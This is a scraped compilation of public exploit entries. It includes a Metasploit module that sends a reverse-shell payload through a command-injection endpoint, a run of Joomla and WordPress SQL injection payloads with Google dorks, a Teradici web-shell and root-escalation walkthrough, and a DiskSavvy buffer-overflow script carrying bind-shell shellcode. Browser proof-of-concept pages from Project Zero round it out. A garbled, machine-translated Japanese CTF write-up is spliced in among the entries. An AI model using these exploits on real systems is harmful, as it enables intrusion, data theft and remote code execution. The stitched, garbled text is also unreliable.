        {
          'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget'
        },
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'CmdStagerFlavor' => %w{ echo printf wget },
      'DefaultTarget'   => 0))
  end

  def check
    begin
      fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
      res = send_request_cgi(
        'uri' => "/shell?echo+#{fingerprint}",
        'headers' => { 'Connection' => 'Keep-Alive' }
      )
      if res && res.body.include?(fingerprint)
        return CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      return CheckCode::Unknown
    end
    CheckCode::Safe
  end

  def execute_command(cmd, opts)
    begin
      send_request_cgi(
        'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
        'headers' => { 'Connection' => 'Keep-Alive' }
      )
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def exploit
    print_status("#{peer} - Connecting to target")

    unless check == CheckCode::Vulnerable
      fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
    end

    print_good("#{peer} - Target is vulnerable!")

    execute_cmdstager(linemax: 1500)
  end
end
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_onevote
# Date: 27.02.2017
# Vendor Homepage: http://advcomsys.com/
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
# Demo: http://advcomsys.com/index.php/joomla-demos/elections
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
# +/*!50000union*/+select+@@version-- -
# # # # #
HireHackking

1。Base16復号化

質問名:base64÷4質問添付ファイル:https://adworld.xctf.org.cn/media/task/attachments/C8CB2B557B57475D8EC1EDED36E819AC4D.TXT質問WRITEUP3360

1。質問のタイトルによると、推測はbase162です。オンラインBase16:https://www.qxiuzi.cn/bianma/base.php?type=16 1049983-20210806171351360-1912523458.png3を復号化することで入手できます。復号化スクリプト:Base64のインポート

S='666C61677B453333423746444384133423834314341393639394544444444241323442363041417D' '

flag=base64.b16decode(s)

印刷フラグ1049983-20210806171351783-386848167.png4。最後にflag:flag {e33b7fd8a3b841ca9699eddba24b60aa}

2。 Modbus Industrial Agreement Traffic Package Analysis

タイトル:魔法のmodbus質問説明:flagを見つける、sctf {xxx}添付ファイルのコンテンツを見つけます: https://adworld.xctf.org.cn/media/task/Attachments/22FC3D84E8434AED89CBC0BBD95A07B4.PCAPNG基本知識:MODBUSはシリアル通信プロトコルです。 Modbusは、産業分野での通信プロトコルの業界標準(事実上)になり、現在では産業用電子機器間で一般的に使用されている接続方法です。質問writeup:01。文字列フラグキーワードを検索することにより、関連する検索はありません。1049983-20210806171352211-1482364322.png2。 SCTFキーワードを検索すると、SCTF形式が表示されます。1049983-20210806171353392-632343064.png結果は次のとおりです。SCTF{easy_mdbus}、提出エラー1049983-20210806171354057-281842400.jpgタイトル名modbusキーワードによると、添付ファイルのコンテンツのトラフィックパッケージに1つが欠落している可能性があります。提出flag

3。トラフィックパケットHTTPプロトコルの分析

質問名:wireshark-1質問説明:ハッカーは、管理者がwiresharkを介してウェブサイトにログインするためのトラフィックパッケージをキャッチしました(管理者のパスワードは答えです)。フラグの提出フォームはフラグ{xxxx}添付ファイルコンテンツ:https://adworld.xctf.org.cn/media/task/attachments/ab8cfea4444444444d4d8bd96c7f769ce1309.zip question writeup:1。 Wiresharkを使用してトラフィックパッケージを開き、HTTPキープロトコルを検索し、Post Data Packet 1049983-20210806171355108-1699664680.png2を見つけます。トラッキングフロー - HTTPフロー1049983-20210806171355560-724652940.png3。投稿で提出されたパスワードキーワードのバックドアの内容、つまり答えは、Flag 1049983-20210806171356770-161957398.png4です。最終フラグは次のとおりです。Flag{FFB7567A1D4F4F4ABDFFDB54E022F8FACD}

iv。写真の執筆

質問名:Pure_Color質問説明:フォーマットはフラグ{{

HireHackking 
# # # # # 
# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_multitier
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/
# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL]
# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- -
# # # # #
HireHackking 
# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
# Date: February 22nd, 2017
# Exploit Author: hantwister
# Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
# Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
# Version: 2.2.0


Users that can access the Settings > Database Management page can achieve code
execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)


Web Shell Upload Vulnerability Overview
---------------------------------------

Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
malicious archive with a malicious web script that extracts to the known
directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
it is possible to add or modify class files and XML files pertaining to the
application.


Privilege Escalation Vulnerability Overview
-------------------------------------------

The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
has sudo rights to run that file without a password. By manipulating this file,
arbitrary code can be run as root.


Exploiting The Vulnerabilities
------------------------------

alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~$ cd runasroot
alice:~/runasroot$ msfvenom (snip) > evil
alice:~/runasroot$ chmod a+x evil
alice:~/runasroot$ nano modify_self_restart.sh

#!/bin/bash
echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh

alice:~/runasroot$ chmod a+x modify_self_restart.sh
alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp

<html>
<head>
<title>runasroot</title>
</head>
<body>
<pre>
<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
</pre>
</body>
</html>

alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p

Now, choose to upload runasroot.archive through the Database Management page. An
error will be displayed that it wasn't a valid archive. Now, navigate to
https://IP/console/images/runasroot.gsp
HireHackking 
# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
# Date: 02/18/2017
# Exploit Author: Hanley Shun
# Vendor Homepage: https://wpcore.com/plugin/mail-masta
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
# Version: 1.0
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]


Mail-Masta SQL Injection

Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)

GET Parameter: list_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php


csvexport.php:

$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);


Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)

GET Parameter: filter_list

http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1


view-list.php:

global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));


Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)

POST Parameter: camp_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php


count_of_send.php:

include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from  $masta_reports where camp_id=$camp_id and status=1");


Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)

POST Parameter: list_id

campaign_save.php:

$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");


POST /wp-admin/admin-ajax.php?id= HTTP/1.1

...snip...

action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
HireHackking 
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters 
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64

# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php

import socket
import sys

try:
    host = sys.argv[1]
    os = sys.argv[2]
    port = 80
except IndexError:
    print "[+] Usage %s <host>  win7/win10" % sys.argv[0]
    print "[i] Example: dsavvy.py localhost win10"
    sys.exit()


# 355 bytes bind shell, PORT 4444,  bad chars \x09\x0a\x0d\x20
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")

crash = "\x41" * 2487
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
filler = "\x44" * (2505-334-300-100)
nseh = "\xeb\x08\x90\x90"
stack_fill="\x41"*100
nops="\x90"*8
egg = "t00wt00w"

if os == "win7":
  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x33\xd2" 
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xef\xb8" 
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")

elif os == "win10":
  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")

else:
  print "[!] This windows version is not supported yet"
  exit(0)

exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops  + shell + filler

buffer = "GET /"+exploit+" HTTP/1.1\r\n"
buffer+= "Host: "+host+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://"+host+"/login\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()
HireHackking 
# Exploit Title: Shutter user-assisted remote code execution
# Date: 2016-12-26
# Software Link: http://shutter-project.org/
# Version: 0.93.1
# Tested on: Ubuntu,  Debian
# Exploit Author: Prajith P
# Website: http://prajith.in/
# Author Mail: me@prajith.in
# CVE: CVE-2016-10081

1. Description.
   /usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
attackers to execute arbitrary commands via a crafted image name that is
mishandled during a "Run a plugin" action.

2. Proof of concept.
   1) Rename an image to something like "$(firefox)"
   2) Open the renamed file in shutter
   3) Click the "Run a plugin" option and select any plugin from the list and click "Run"

3. Solution:
  https://bugs.launchpad.net/shutter/+bug/1652600


Thanks,
Prajithh
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024

Chrome bug:

https://bugs.chromium.org/p/chromium/issues/detail?id=671328

PoC:
-->

<style>
content { contain: size layout; }
</style>
<script>
function leak() {
 document.execCommand("selectAll"); 
 opt.text = ""; 
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>

<!--
Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.
-->
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2store
# Date: 23.02.2017
# Vendor Homepage: http://jworkplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/
# Demo: http://k2store.jworkplace.com/
# Version: 3.8.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_userextranet
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2ajaxsearch
# Date: 24.02.2017
# Vendor Homepage: http://taleia.software/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/
# Demo: http://k2ajaxsearch.taleia.software/demo/
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan
# # # # #
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049

When the new page is loading, FrameLoader::clear is called to clear the old document and window.

Here's a snippet of FrameLoader::clear.

void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)

        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }

    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
}

The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.


Tested on Safari 10.0.2(12602.3.12.0.1).
-->

<body>
<script>

/*

Apple WebKit: UXSS via FrameLoader::clear

When the new page is loading, FrameLoader::clear is called to clear the old document and window.

Here's a snippet of FrameLoader::clear.

void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)

        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }

    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
}

The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.


Tested on Safari 10.0.2(12602.3.12.0.1).
*/

"use strict";

function log(txt) {
    //if (Array.isArray(txt))
    //    txt = Array.prototype.join.call(txt, ", ");

    let c = document.createElement("div");
    c.innerText = "log: " + txt;
    d.appendChild(c);
}

function main() {
    let f = document.body.appendChild(document.createElement("iframe"));
    
    let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
    a.contentWindow.onunload = () => {
        let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
        b.contentWindow.onunload = () => {
            f.src = "javascript:''";

            let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
            c.contentWindow.onunload = () => {
                f.src = "javascript:''";

                let d = f.contentDocument.appendChild(document.createElement("iframe"));
                d.contentWindow.onunload = () => {
                    f.src = "javascript:setTimeout(eval(atob('" + btoa("(" +function () {
                        alert(document.location);
                    } + ")") + "')), 0);";
                };
            };
        };
    };

    f.src = "https://abc.xyz/";
}

main();

/*
b JSC::globalFuncParseFloat

*/
</script>
</body>
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitypolls
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
# Demo: http://demo.corejoomla.com/polls.html
# Version: 4.5.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitypolls&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Community Surveys v4.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitysurveys
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/community-surveys/
# Demo: http://demo.corejoomla.com/surveys.html
# Version: 4.3
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitysurveys&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component JooDatabase v3.1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_joodb
# Date: 24.02.2017
# Vendor Homepage: https://feenders.de/
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/joodatabase/
# Demo: https://joodb.feenders.de/db-example.html
# Version: 3.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=[SQL]&searchfield=Ihsan_Sencan
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=Ihsan_Sencan&searchfield=[SQL]
# # # # #
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040

HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help

or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html

HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.

HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".

PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";

The attached poc will pop up a Calculator.

Tested on macOS Sierra 10.12.1 (16B2659).
-->

<script>

/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.

HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help

or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html

HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.

HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".

PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";

The attached poc will pop up a Calculator.

Tested on macOS Sierra 10.12.1 (16B2659).

*/

function main() {
    function second() {
        var f = document.createElement("iframe");
        f.onload = () => {
            f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
        };

        f.src = "help:openbook=com.apple.safari.help";

        document.documentElement.appendChild(f);
    }

    var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";

